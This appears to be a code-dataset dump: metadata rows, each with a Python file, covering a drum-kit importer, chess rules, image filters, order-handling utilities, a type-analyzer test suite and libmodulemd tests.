hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 248 | max_stars_repo_name stringlengths 5 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 248 | max_issues_repo_name stringlengths 5 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 248 | max_forks_repo_name stringlengths 5 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 5 2.06M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.03M | alphanum_fraction float64 0 1 | count_classes int64 0 1.6M | score_classes float64 0 1 | count_generators int64 0 651k | score_generators float64 0 1 | count_decorators int64 0 990k | score_decorators float64 0 1 | count_async_functions int64 0 235k | score_async_functions float64 0 1 | count_documentation int64 0 1.04M | score_documentation float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
57e9e749952419b13882858f912e11103e5702e3 | 263 | py | Python | part_1_read_test_dat.py | MOTWODAHS/cc_tools | bcf79bc62c4db06bc64622f118d62b171691e80d | [
"MIT"
] | null | null | null | part_1_read_test_dat.py | MOTWODAHS/cc_tools | bcf79bc62c4db06bc64622f118d62b171691e80d | [
"MIT"
] | null | null | null | part_1_read_test_dat.py | MOTWODAHS/cc_tools | bcf79bc62c4db06bc64622f118d62b171691e80d | [
"MIT"
] | null | null | null | import cc_dat_utils
#Part 1
input_dat_file = "data/pfgd_test.dat"
#Use cc_dat_utils.make_cc_level_pack_from_dat() to load the file specified by input_dat_file
#print the resulting data
data = cc_dat_utils.make_cc_level_pack_from_dat(input_dat_file)
print(data) | 26.3 | 92 | 0.836502 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 144 | 0.547529 |
57ea16b86e437b4ce502cfa0fbd2394638685369 | 4,808 | py | Python | src/gen_drum_kit/importer/importer_hydrogen.py | peter-zenk/genDrumkit | a74bae332443db6424be46ebd32b8fffeac14ce1 | [
"MIT"
] | 7 | 2020-06-25T15:36:17.000Z | 2022-01-09T21:43:27.000Z | src/gen_drum_kit/importer/importer_hydrogen.py | peter-zenk/genDrumkit | a74bae332443db6424be46ebd32b8fffeac14ce1 | [
"MIT"
] | 3 | 2022-01-09T20:44:52.000Z | 2022-02-02T10:43:23.000Z | src/gen_drum_kit/importer/importer_hydrogen.py | peter-zenk/genDrumkit | a74bae332443db6424be46ebd32b8fffeac14ce1 | [
"MIT"
] | 1 | 2020-08-16T18:17:26.000Z | 2020-08-16T18:17:26.000Z | '''
Created on Jun 14, 2020
@author: peter
'''
import sys
import re
import tarfile
from os import path
import xml.etree.ElementTree as ET
import logging
from gen_drum_kit.importer.importer_base import ImporterBase
from gen_drum_kit.builder.builder_hydrogen import Builder_Hydrogen
from gen_drum_kit.util import dir_exists
logger = logging.getLogger(__name__)
class ImporterHydrogen(ImporterBase):
""" importer that reads in a Hydrogen drum kit DB """
def __init__(self, params):
super().__init__(params)
logger.debug("Running in debug mode ...")
logger.debug("ImporterBase '%s' created.", __name__)
self._xml = None # assigned later
def importData(self):
self._prepare()
# Load drumkit info from XML file and create a drumkit object
logger.info("Loading Hydrogen XML file '%s'...", self._params.HG_xml)
self._xml = self._read_xml(self._params.HG_xml)
self._debug_print() # only in debug mode
self._read_map_file()
# private functions ----------------------
def _createBuilder(self):
# create and return the builder
logger.info("Creating drum kit from Hydrogen data.")
return(Builder_Hydrogen(params=self._params, xml=self._xml, mapDB=self._channel_map))
def _read_xml(self, HG_xml):
try:
tree = ET.parse(HG_xml)
except:
logger.error("Error reading XML from '%s'! Aborting ...", HG_xml)
sys.exit(2)
logger.info("XML file '%s' successfully read", HG_xml)
self._xml_remove_namespace(tree)
return(tree)
@staticmethod
def _xml_remove_namespace(tree):
root = tree.getroot()
namespaces = re.findall(r"{.*}", root.tag)
try:
namespace = namespaces[0]
logger.debug(namespace)
except:
return() # nothing to be done
nsl = len(namespace)
for elem in root.getiterator():
if elem.tag.startswith(namespace):
elem.tag = elem.tag[nsl:]
return()
def _debug_print(self):
#ET.dump(self._xml)
root = self._xml.getroot()
logger.debug("XML Root is: '%s'", root)
for n1 in root:
logger.debug("\t%s - %s", n1.tag, n1.text)
for n2 in n1:
logger.debug("\t\t%s - %s", n2.tag, n2.text)
for n3 in n2:
logger.debug("\t\t\t%s - %s", n3.tag, n3.text)
for n4 in n3:
logger.debug("\t\t\t\t%s - %s", n4.tag, n4.text)
for n5 in n4:
logger.debug("\t\t\t\t\t%s - %s", n5.tag, n5.text)
def _prepare(self):
if self._params.HG_db:
self._extract_HG_db()
def _extract_HG_db(self):
if not path.exists(self._params.HG_db):
logger.warning("Hydrogen DB '%s' does not exists. Aborting ...", self._params.HG_db )
logger.info("Try on unpacked kit (Hydrogen XML)!")
sys.exit(1)
# if kit name is not set use base name of HG DB file
if not self._params.drumkit_name:
self._params.drumkit_name = path.basename(self._params.HG_db).replace(".h2drumkit", "")
self._params.src_dir = self._params.tmp_dir + "/" + self._params.drumkit_name
self._params.HG_xml = self._params.src_dir + "/drumkit.xml"
# unpack hydrogen file
logger.info("Unpacking Hydrogen data file '%s' to '%s' ...", self._params.HG_db,
self._params.tmp_dir)
try: # open archive, could be gzipped tar or plain tar
logger.debug("Assume it it is gzip'ed tar archive ...")
tar = tarfile.open(self._params.HG_db, "r:gz")
except:
logger.debug("Failed: Assume it is old style tar'ed archive ...")
try:
tar = tarfile.open(self._params.HG_db, "r")
except:
logger.error("Failed to open Hydrogen data file. Aborting ...")
sys.exit(1)
try: # extract
logger.debug("Extracting ...")
tar.extractall(self._params.tmp_dir)
tar.close()
except:
logger.error("Failed to unpack Hydrogen data file. Aborting ...")
sys.exit(1)
# check if name from Hydrogen DB file matches unpacked directory name
if not dir_exists(self._params.src_dir):
logger.error("Name of drum kit '%s' seems to be incorrect! " +
"Please check the unpacked data in directory '%s'. Aborting ..." ,
self._params.drumkit_name, self._params.tmp_dir)
sys.exit(1)
self._params.clean_rm.append(self._params.src_dir)
| 34.84058 | 99 | 0.576955 | 4,419 | 0.919093 | 0 | 0 | 455 | 0.094634 | 0 | 0 | 1,307 | 0.271839 |
57eb7325fe9ef8d6594ce7350e80b8d6714ba595 | 3,094 | py | Python | icbd/type_analyzer/tests/parametric.py | kmod/icbd | 9636564eb3993afa07c6220d589bbd1991923d74 | [
"MIT"
] | 7 | 2015-04-06T15:17:13.000Z | 2020-10-21T04:57:00.000Z | icbd/type_analyzer/tests/parametric.py | kmod/icbd | 9636564eb3993afa07c6220d589bbd1991923d74 | [
"MIT"
] | null | null | null | icbd/type_analyzer/tests/parametric.py | kmod/icbd | 9636564eb3993afa07c6220d589bbd1991923d74 | [
"MIT"
] | 4 | 2016-05-16T17:53:08.000Z | 2020-11-28T17:18:50.000Z | import collections
def unknown():
raise Exception()
l = [1] # 0 [<int|str>]
l.append(2) # 0 [<int|str>] # 2 (<int|str>) -> None
l.append('')
l[0] = 1
l[0] = ""
l2 = list(l) # 0 [<int|str>]
l2 = sorted(l) # 0 [<int|str>]
x = collections.deque(l2).pop() # 0 <int|str>
l2 = reversed(l) # 0 iterator of <int|str>
l2 = {1:l}[1] # 0 [<int|str>]
l2 = {'':l}[1] # 0 [<int|str>] # e 5
l2 = (l, l)[0] # 0 [<int|str>]
l = range(5)
l2 = list(l) # 0 [int]
l2 = sorted(l) # 0 [int]
x = collections.deque(l2).pop() # 0 int
l2 = reversed(l) # 0 iterator of int
l2 = {1:l}[1] # 0 [int]
l2 = {'':l}[1] # 0 [int] # e 5
l2 = (l, l)[0] # 0 [int]
d = dict([(1,2), (3,4)]) # 0 {int:int}
d = dict([]) # 0 {<unknown>:<unknown>}
d = dict([1]) # 0 <unknown> # e 4
d = dict(1) # 0 <unknown> # e 4
d = dict(unknown()) # 0 {<unknown>:<unknown>}
d = dict({1:''}) # 0 {int:str}
d = dict(a=1) # 0 {str:int}
l = range(3) # 0 [<int|object>]
l.extend([object()])
s = set() # 0 set(int)
s.add(2) # 0 set(int) # 2 (int) -> None
s = set() # 0 set(<unknown>)
s = set(2) # e 4 # 0 set(<unknown>)
s = set('') # 0 set(str)
l = []
l[''] = 1 # e 0
def f(x): # 4 (int) -> str
return ''*x
l1 = range(2) # 0 [int]
l2 = map(f, l1) # 0 [str]
s1 = "abc123" # 0 str
# filter special cases strings...
s2 = filter(str.isalpha, s1) # 0 str
s3 = ''.join(s2) # 0 str
s4 = filter(str.isalpha, [s1]) # 0 [str]
d = {1:2} # 0 {int:int}
d2 = d.copy() # 0 {<int|str>:<bool|int>}
d2[''] = True # 0 {<int|str>:<bool|int>}
d = {1:''} # 0 {int:str}
t = d.popitem() # 0 (int,str)
d.clear()
d = {1:2} # 0 {int:<int|str>}
x = d.setdefault(2, '') # 0 <int|str>
d = {1:2} # 0 {int:int}
x = d.get(2, '') # 0 <int|str>
s = set([1,2]) # 0 set(int)
s2 = s.difference(['']) # 0 set(int)
s = set([1,2]) # 0 set(int)
s2 = s.difference_update(['']) # 0 None
s = set([1, 2])
x = s.pop() # 0 int
s.remove('') # e 0
s.remove(0)
s = set([1, 2]) # 0 set(int)
l = ["a"] # 0 [str]
s2 = s.symmetric_difference(l) # 0 set(<int|str>)
s = set([1, 2]) # 0 set(<int|str>)
l = ["a"] # 0 [str]
s2 = s.symmetric_difference_update(l) # 0 None
s = set([1, 2]) # 0 set(int)
l = ["a"] # 0 [str]
s2 = s.union(l) # 0 set(<int|str>)
s = set([1, 2]) # 0 set(<int|str>)
l = ["a"] # 0 [str]
s2 = s.update(l) # 0 None
t1 = (1,) # 0 (int,)
t2 = ('',) # 0 (str,)
t3 = t1 + t2 # 0 (int,str)
s = set([''])
s.issubset([1]) # e 0
s.issuperset([1]) # e 0
s = set(['', 1])
s.issubset([1]) # e 0
s.issuperset([1])
s = set([1])
s.issubset([1, ''])
s.issuperset([1, '']) # e 0
def f9():
r = range(5) # 4 [int]
f = map(float, r) # 4 [float]
m = max(f) # 4 float
def f(x, y): # 8 (str,int) -> [str]
return [x] * y
l = map(f, "aoeu", range(4)) # 4 [[str]]
def f10():
def is_divisible(x, k): # 8 (int,int) -> bool
return (x%k) == 0
l = filter(lambda x:is_divisible(x, 3), range(100)) # 4 [int]
l2 = filter(None, range(10)) # 4 [int]
print l2
l3 = filter(None, "") # 4 str
l4 = filter(None, [""]) # 4 [str]
if 1:
l = ''
else:
l = [1]
l5 = filter(None, l) # 4 <[int]|str> # 22 <[int]|str>
| 21.486111 | 65 | 0.486102 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,222 | 0.394958 |
57ecf565cf5dcf9d17a6be622ca1dec561a24016 | 2,001 | py | Python | pylab/image/restoration/blind_deconv.py | N8Grant/Blind-Deconvolution-Python | a5e18e2b68b1cdd81a35d2db07b66d735aceac15 | [
"MIT"
] | null | null | null | pylab/image/restoration/blind_deconv.py | N8Grant/Blind-Deconvolution-Python | a5e18e2b68b1cdd81a35d2db07b66d735aceac15 | [
"MIT"
] | null | null | null | pylab/image/restoration/blind_deconv.py | N8Grant/Blind-Deconvolution-Python | a5e18e2b68b1cdd81a35d2db07b66d735aceac15 | [
"MIT"
] | null | null | null | import matlab.engine
import matlab
import numpy as np
import PIL
import matplotlib.pyplot as plt
import sys
print(sys.version_info[0:2])
if sys.version_info[0:2] != (3, 8) and sys.version_info[0:2] != (3, 7) and sys.version_info[0:2] != (3, 6):
raise Exception('Requires python 3.6, 3.7, or 3.8')
eng = matlab.engine.start_matlab()
def blind_deconvolution(image, kernel_size=3, num_iterations=30, weighted=False, edge_weight=.08):
# If URL to image
if type(image) == type(str()):
image = PIL.Image.open(image)
image = PIL.ImageOps.grayscale(image)
# If PIL image object
elif type(image) == PIL.Image:
image = np.asarray(image)
image = PIL.ImageOps.grayscale(image)
# If its already in numpy array
elif type(image) == np.ndarray:
image = PIL.Image.fromarray(image)
image = PIL.ImageOps.grayscale(image)
# Else raise exception
else:
raise Exception('Input was of type ' + str(type(image)) + '. Must be a URL to an image, a PIL Image object, or an np array')
# If weighted
if weighted:
weight = eng.edge(image,"sobel",edge_weight)
se = eng.strel("disk",2)
weight = 1-matlab.double(eng.imdilate(weight,se))
# Starting kernel
start_kernel_np = np.ones((kernel_size,kernel_size))
start_kernel = []
image_np = np.asarray(image)
image = []
# Convert to matlab types
for i in range(len(start_kernel_np)):
start_kernel.append(matlab.double(start_kernel_np[i].tolist()))
start_kernel = matlab.double(start_kernel)
for i in range(len(image_np)):
image.append(matlab.double(image_np[i].tolist()))
image = matlab.double(image)
# Call Matlab Blind deconvolution
if weighted:
deconvolved = eng.deconvblind(image, start_kernel, num_iterations, weight)
else:
deconvolved = eng.deconvblind(image, start_kernel)
deconvolved = np.asarray(deconvolved).squeeze()
return deconvolved | 32.274194 | 132 | 0.66067 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 311 | 0.155422 |
57ef2758e6f78fd8c86e719186446c008e2338ee | 6,642 | py | Python | chess-ai-master/game/rules.py | explodicus/intelliSah | acbec81a58292b788e2c7c0c7ea1ea04572a072f | [
"MIT"
] | null | null | null | chess-ai-master/game/rules.py | explodicus/intelliSah | acbec81a58292b788e2c7c0c7ea1ea04572a072f | [
"MIT"
] | null | null | null | chess-ai-master/game/rules.py | explodicus/intelliSah | acbec81a58292b788e2c7c0c7ea1ea04572a072f | [
"MIT"
] | null | null | null | from collections import defaultdict
import pieces
class RulesEnforcer(object):
"""
Enforces the rules of the game
Examines the move, and determines whether its a valid move or not.
"""
letter_dict = {'a':0,'b':1,'c':2,'d':3,'e':4,'f':5,'g':6,'h':7}
pos_letters = letter_dict.keys()
pos_nums = [1,2,3,4,5,6,7,8]
letter_dict_rev = dict((v,k) for k,v in letter_dict.iteritems())
possible_pieces = ['p','r','n','b','q','k']
def __init__(self):
pass
@staticmethod
def check_square(chessboard, coordinate):
"""
Takes as input a chess board and coordinate and outputs
what is inside that space
This is useful for a variable of purposes
"""
mycord = RulesEnforcer.coordinate_mapper(coordinate)
first = mycord[0]
second = mycord[1]
return chessboard[first][second]
@staticmethod
def possible_moves(chessboard, color, piece, coordinate):
"""return possible moves of a piece
a number of things need to be taken into a count
1. whether we are allowed to move the piece
input: piece, color, and coordinate of piece
output: all possible moves of the piece (lists of lists)
Example of a cooridinate: a2
"""
#if the coordinate is an array
if type(coordinate) == list:
coordinate = RulesEnforcer.coordinate_mapper_reverse(coordinate)
#break out coordinate into a list of len(2)
cords = list(coordinate)
cords[1] = int(cords[1])
#pawns
if piece == 'p':
pos_moves = pieces.Pawn.moves(cords, color, chessboard)
#rook
elif piece == 'r':
pos_moves = pieces.Rook.moves(cords, color, chessboard)
#knight
elif piece == 'n':
pos_moves = pieces.Knight.moves(cords, color, chessboard)
#bishop
elif piece == 'b':
pos_moves = pieces.Bishop.moves(cords, color, chessboard)
#queen
elif piece == "q":
pos_moves = pieces.Queen.moves(cords, color, chessboard)
#king
elif piece == "k":
pos_moves = pieces.King.moves(cords, color, chessboard)
else:
return "invalid inputs!"
return pos_moves
@staticmethod
def all_possible_moves(chessboard, color):
"""takes as input a chessboard and generates all possible moves
input:
color: color that you want to generate moves for, 'w' or 'b'
chessboard: 8x8 chessboard
output: dict of all possible moves
key: piece and position
value: list of list of possible moves
"""
#dict for storing all the moves
all_moves = defaultdict()
for cor1, row in enumerate(chessboard):
for cor2, square in enumerate(row):
if square.split('-')[0] == color:
piece = square.split('-')[1]
coordinate = [cor1, cor2]
moves = RulesEnforcer.possible_moves(chessboard, color, piece, coordinate)
if moves:
all_moves[RulesEnforcer.coordinate_mapper_reverse(coordinate)] = moves
return all_moves
@staticmethod
def remove_outofbound_moves(pos_moves):
"""remove moves that are out of range of the board
input: list of list of moves
output: list of list of moves, with out of bound moves removed
"""
to_remove = []
for i in range(len(pos_moves)):
if pos_moves[i][0] not in RulesEnforcer.pos_letters or pos_moves[i][1] not in RulesEnforcer.pos_nums:
to_remove.append(pos_moves[i])
for i in to_remove:
pos_moves.remove(i)
return pos_moves
@staticmethod
def collision_detection(move, color, chessboard):
"""
Collision detection for the chess game.
input:
move: the move i.e ['a',7]
color: white ('w') or black ('b')
chessboard: chessboard object
output: "friend" or "enemy" depending on what color you are and what the enemy color is
"""
try:
move = RulesEnforcer.coordinate_mapper(move)
except:
return False
x = move[0]
y = move[1]
try:
piece = chessboard[x][y]
except:
return False
if color == 'w' and piece.split('-')[0] == 'w':
return "friend"
elif color == 'b' and piece.split('-')[0] == 'b':
return "friend"
if color == 'w' and piece.split('-')[0] == 'b':
return "enemy"
elif color == 'b' and piece.split('-')[0] == 'w':
return "enemy"
else:
return "empty"
@staticmethod
def move_allowed(move, chessboard):
"""
Determine if the move is allowed
input:
move: the move
chessboard: chessboard object
output: boolean, whether the move is allowed or not
"""
pass
@staticmethod
def coordinate_mapper(mycoordinate):
"""takes as input a chess coordinate and maps it to the coordinate in the array
input: chess coordinate (ie a5)
output: coordinate of the array to be used in the chessboard
for example: [0,2]
"""
mycoordinate = list(mycoordinate)
starthor = RulesEnforcer.letter_dict[mycoordinate[0]]
startver = 7 - (int(mycoordinate[1]) - 1)
return [startver, starthor]
@staticmethod
def coordinate_mapper_reverse(myarray):
"""
Does the opposite of coordinate_mapper(). Takes as input array coordinates (ie. [0,5])
This method is useful if you
input: a length 2 list of array coordinates
output: chess coordinate (str)
example:
[7,0] -> a1
"""
#letter of cor
first_cor = RulesEnforcer.letter_dict_rev[myarray[1]]
#number of cor
second_cor = 8 - myarray[0]
return str(first_cor) + str(second_cor)
@staticmethod
def legal_move_checker(start, finish):
"""checks if a move is legal or not based on the type of piece"""
pass | 29.651786 | 113 | 0.546372 | 6,591 | 0.992322 | 0 | 0 | 6,047 | 0.910419 | 0 | 0 | 2,596 | 0.390846 |
57f2007543d3878ef0bed9620dac66d11e435984 | 178 | py | Python | eyed/rpc/bacnetd/__init__.py | ThousandMileEye/Eye | b0eca371fed5e01353ebddf7e4c400927decf0d2 | [
"Apache-2.0"
] | null | null | null | eyed/rpc/bacnetd/__init__.py | ThousandMileEye/Eye | b0eca371fed5e01353ebddf7e4c400927decf0d2 | [
"Apache-2.0"
] | 55 | 2017-12-21T15:20:36.000Z | 2019-01-20T02:49:41.000Z | eyed/rpc/bacnetd/__init__.py | ThousandMileEye/Eye | b0eca371fed5e01353ebddf7e4c400927decf0d2 | [
"Apache-2.0"
] | 3 | 2018-05-18T09:02:36.000Z | 2019-12-29T10:27:44.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from bacnetd import SingleBACnetdService
from bacnetd import BACnetdService
__all__ = [
SingleBACnetdService,
BACnetdService,
]
| 16.181818 | 40 | 0.752809 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 44 | 0.247191 |
57f2ae3f2e4e218865d07977bbf3e1de0603e097 | 2,280 | py | Python | gotham.py | amirothman/audio-visualization | 3a5efe97a1d98de06e84296f97081cd2d74fe9e2 | [
"MIT"
] | null | null | null | gotham.py | amirothman/audio-visualization | 3a5efe97a1d98de06e84296f97081cd2d74fe9e2 | [
"MIT"
] | null | null | null | gotham.py | amirothman/audio-visualization | 3a5efe97a1d98de06e84296f97081cd2d74fe9e2 | [
"MIT"
] | null | null | null | from skimage.util import img_as_float
from skimage import io, filters
# from skimage.viewer import ImageViewer
import numpy as np
def split_image_into_channels(image):
"""Look at each image separately"""
red_channel = image[:, :, 0]
green_channel = image[:, :, 1]
blue_channel = image[:, :, 2]
return red_channel, green_channel, blue_channel
def merge_channels(red, green, blue):
"""Merge channels back into an image"""
return np.stack([red, green, blue], axis=2)
def sharpen(image, a, b):
"""Sharpening an image: Blur and then subtract from original"""
blurred = filters.gaussian(image, sigma=10, multichannel=True)
sharper = np.clip(image * a - blurred * b, 0, 1.0)
return sharper
def channel_adjust(channel, values):
# preserve the original size, so we can reconstruct at the end
orig_size = channel.shape
# flatten the image into a single array
flat_channel = channel.flatten()
# this magical numpy function takes the values in flat_channel
# and maps it from its range in [0, 1] to its new squeezed and
# stretched range
adjusted = np.interp(flat_channel, np.linspace(0, 1, len(values)), values)
# put back into the original image shape
return adjusted.reshape(orig_size)
def gotham(
original_image,
r_boost_upper=1,
b_adjusted_upper=1,
blurriness=1.3,
subtraction=0.3,
amount_bluer_blacks=0.03,
):
original_image = img_as_float(original_image)
r, g, b = split_image_into_channels(original_image)
# np.linspace second argument
r_boost_lower = channel_adjust(r, np.linspace(0, r_boost_upper))
# amount of bluer_blacks
bluer_blacks = merge_channels(
r_boost_lower, g, np.clip(b + amount_bluer_blacks, 0, 1.0)
)
# amount blurriness, and subtraction
sharper = sharpen(bluer_blacks, blurriness, subtraction)
r, g, b = split_image_into_channels(sharper)
# np.linspace second argument
b_adjusted = channel_adjust(b, np.linspace(0, b_adjusted_upper))
return merge_channels(r, g, b_adjusted)
if __name__ == "__main__":
original_image = io.imread("data/input/sample.jpg")
output = gotham(original_image, b_adjusted_upper=3)
io.imsave("data/output/image-experiment/gotham.jpg", output)
| 30 | 78 | 0.705263 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 651 | 0.285526 |
57f6365978e8a716c23c881a108a840cc548fa4a | 2,116 | py | Python | backend/backend/integration_utils.py | kaipietila/CookOS | b28f91cf5a750303a27e2e4589ea5a6ed271d295 | [
"MIT"
] | null | null | null | backend/backend/integration_utils.py | kaipietila/CookOS | b28f91cf5a750303a27e2e4589ea5a6ed271d295 | [
"MIT"
] | null | null | null | backend/backend/integration_utils.py | kaipietila/CookOS | b28f91cf5a750303a27e2e4589ea5a6ed271d295 | [
"MIT"
] | null | null | null | from datetime import datetime
from backend.backend.classes_main import Order, OrderItemStateUpdate, OrderUpdate, StatusHistory
from backend.backend.exceptions import NoOrderFoundException
from backend.backend.repository import get_order_by_id, update_items, update_order_status, get_orders, create_order
from backend.backend.delivery_integration import update_delivery_provider
from backend.backend.schemas import OrderSchema
async def fetch_orders():
orders = await get_orders()
return orders
async def create_new_order(order_dict: OrderSchema):
id = await create_order(order_dict)
return id
async def create_new_status_history(new_state: str):
status_history = StatusHistory(
response = '',
source = 1, # 1 is restaurant
status = new_state,
timeStamp = str(datetime.now()),
)
return status_history
async def update_order_state(update_data: OrderUpdate, existing_order: Order):
existing_order.status = update_data.new_order_state
status_history = await create_new_status_history(update_data.new_order_state)
existing_order.status_history.append(status_history)
await update_order_status(existing_order)
async def update_state(order_id: str, update_data: OrderUpdate):
existing_order = await get_order_by_id(order_id)
if not existing_order:
raise NoOrderFoundException(f'Order by id {order_id} not found')
await update_order_state(update_data, existing_order)
# When order status is updated we update the delivery provider
update_delivery_provider()
async def update_item_state(order_id: str, update_data: OrderItemStateUpdate):
existing_order = await get_order_by_id(order_id)
if not existing_order:
raise NoOrderFoundException(f'Order by id {order_id} not found')
await update_item_list(update_data, existing_order)
async def update_item_list(update_data: OrderItemStateUpdate, existing_order: Order):
for item in existing_order.items:
if item.name == update_data.item_name:
item.status = update_data.new_state
await update_items(existing_order)
| 40.692308 | 115 | 0.778828 | 0 | 0 | 0 | 0 | 0 | 0 | 1,675 | 0.791588 | 151 | 0.071361 |
57f817e2249400abb14e5d1810b119046f3d3c71 | 425 | py | Python | 17b.py | znuxor/adventofcode2017 | 79d0df07f24ea8d2793df3b1c853a85b760791c1 | [
"BSD-3-Clause"
] | null | null | null | 17b.py | znuxor/adventofcode2017 | 79d0df07f24ea8d2793df3b1c853a85b760791c1 | [
"BSD-3-Clause"
] | null | null | null | 17b.py | znuxor/adventofcode2017 | 79d0df07f24ea8d2793df3b1c853a85b760791c1 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from collections import deque
puzzle_input = 377
# puzzle_input = 3
my_circular_buffer = deque()
my_circular_buffer.append(0)
for i in range(1, 50000000+1):
new_pos = puzzle_input % len(my_circular_buffer)
my_circular_buffer.rotate(-new_pos-1)
my_circular_buffer.appendleft(i)
my_circular_buffer.rotate(-my_circular_buffer.index(0))
print(my_circular_buffer[1])
| 23.611111 | 55 | 0.757647 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 63 | 0.148235 |
57fba0e21b454e1612fd2ab00c1169a35e150463 | 1,524 | py | Python | aiobotocore/configprovider.py | vemel/aiobotocore | b7726a4c45b6cdc0a8bf679191ce9c31eb7bd167 | [
"Apache-2.0"
] | null | null | null | aiobotocore/configprovider.py | vemel/aiobotocore | b7726a4c45b6cdc0a8bf679191ce9c31eb7bd167 | [
"Apache-2.0"
] | null | null | null | aiobotocore/configprovider.py | vemel/aiobotocore | b7726a4c45b6cdc0a8bf679191ce9c31eb7bd167 | [
"Apache-2.0"
] | null | null | null | from botocore.configprovider import os, SmartDefaultsConfigStoreFactory
class AioSmartDefaultsConfigStoreFactory(SmartDefaultsConfigStoreFactory):
async def merge_smart_defaults(self, config_store, mode, region_name):
if mode == 'auto':
mode = await self.resolve_auto_mode(region_name)
default_configs = self._default_config_resolver.get_default_config_values(
mode)
for config_var in default_configs:
config_value = default_configs[config_var]
method = getattr(self, f'_set_{config_var}', None)
if method:
method(config_store, config_value)
async def resolve_auto_mode(self, region_name):
current_region = None
if os.environ.get('AWS_EXECUTION_ENV'):
default_region = os.environ.get('AWS_DEFAULT_REGION')
current_region = os.environ.get('AWS_REGION', default_region)
if not current_region:
if self._instance_metadata_region:
current_region = self._instance_metadata_region
else:
try:
current_region = \
await self._imds_region_provider.provide()
self._instance_metadata_region = current_region
except Exception:
pass
if current_region:
if region_name == current_region:
return 'in-region'
else:
return 'cross-region'
return 'standard'
| 40.105263 | 82 | 0.621391 | 1,449 | 0.950787 | 0 | 0 | 0 | 0 | 1,364 | 0.895013 | 112 | 0.073491 |
57fbd59102d12bea08762357826a983d63184e28 | 3,302 | py | Python | modulemd/tests/ModulemdTests/module.py | val-verde/libmodulemd | 1a032da198333ee77bdbe4be65e60eb4115ea73f | [
"MIT"
] | 28 | 2017-12-07T11:42:21.000Z | 2021-09-20T17:34:40.000Z | modulemd/tests/ModulemdTests/module.py | val-verde/libmodulemd | 1a032da198333ee77bdbe4be65e60eb4115ea73f | [
"MIT"
] | 413 | 2018-01-05T15:53:01.000Z | 2022-03-31T11:45:52.000Z | modulemd/tests/ModulemdTests/module.py | val-verde/libmodulemd | 1a032da198333ee77bdbe4be65e60eb4115ea73f | [
"MIT"
] | 72 | 2018-01-15T13:38:34.000Z | 2022-03-15T06:08:27.000Z | #!/usr/bin/python3
# This file is part of libmodulemd
# Copyright (C) 2017-2018 Stephen Gallagher
#
# Fedora-License-Identifier: MIT
# SPDX-2.0-License-Identifier: MIT
# SPDX-3.0-License-Identifier: MIT
#
# This program is free software.
# For more information on the license, see COPYING.
# For more information on free software, see
# <https://www.gnu.org/philosophy/free-sw.en.html>.
from os import path
import sys
try:
import unittest
import gi
gi.require_version("Modulemd", "2.0")
from gi.repository import Modulemd
from gi.repository.Modulemd import ModuleIndex
from gi.repository import GLib
except ImportError:
# Return error 77 to skip this test on platforms without the necessary
# python modules
sys.exit(77)
from base import TestBase
class TestModule(TestBase):
def test_search_streams(self):
idx = Modulemd.ModuleIndex.new()
idx.update_from_file(path.join(self.test_data_path, "f29.yaml"), True)
module = idx.get_module("nodejs")
self.assertEqual(len(module.search_streams("8", 0)), 1)
self.assertEqual(len(module.search_streams("10", 0)), 1)
def test_copy_with_obsoletes(self):
idx = Modulemd.ModuleIndex.new()
e = Modulemd.Obsoletes.new(1, 2, "testmodule", "teststream", "testmsg")
e.set_obsoleted_by("module_obsoleter", "stream_obsoleter")
idx.add_obsoletes(e)
m = idx.get_module("testmodule")
assert m
assert m.get_module_name() == "testmodule"
obsoletes_from_orig = m.get_newest_active_obsoletes("teststream", None)
assert (
obsoletes_from_orig.get_obsoleted_by_module_name()
== "module_obsoleter"
)
m_copy = m.copy()
assert m_copy.get_module_name() == "testmodule"
obsoletes_from_copy = m_copy.get_newest_active_obsoletes(
"teststream", None
)
assert (
obsoletes_from_copy.get_obsoleted_by_module_name()
== "module_obsoleter"
)
def test_adding_obsoletes_is_order_independent(self):
obsoletes_without_context = """
---
document: modulemd-obsoletes
version: 1
data:
module: nodejs
stream: 10
context: deadbeef
modified: 2019-07-27T00:00Z
message: test message
obsoleted_by:
module: nodejs
stream: 12
...
"""
obsoletes_with_context = """
---
document: modulemd-obsoletes
version: 1
data:
module: nodejs
stream: 10
modified: 2019-09-27T00:00Z
message: test message
obsoleted_by:
module: nodejs
stream: 14
...
"""
for ordered_yaml in [
obsoletes_without_context + obsoletes_with_context,
obsoletes_with_context + obsoletes_without_context,
]:
idx = ModuleIndex.new()
stream = Modulemd.ModuleStream.new(2, "nodejs", "10")
stream.props.context = "deadbeef"
res = idx.add_module_stream(stream)
res, failures = idx.update_from_string(ordered_yaml, True)
m = idx.get_module("nodejs")
streams = m.get_all_streams()
s = streams[0]
assert (
s.get_obsoletes_resolved().get_obsoleted_by_module_stream()
== "14"
)
if __name__ == "__main__":
unittest.main()
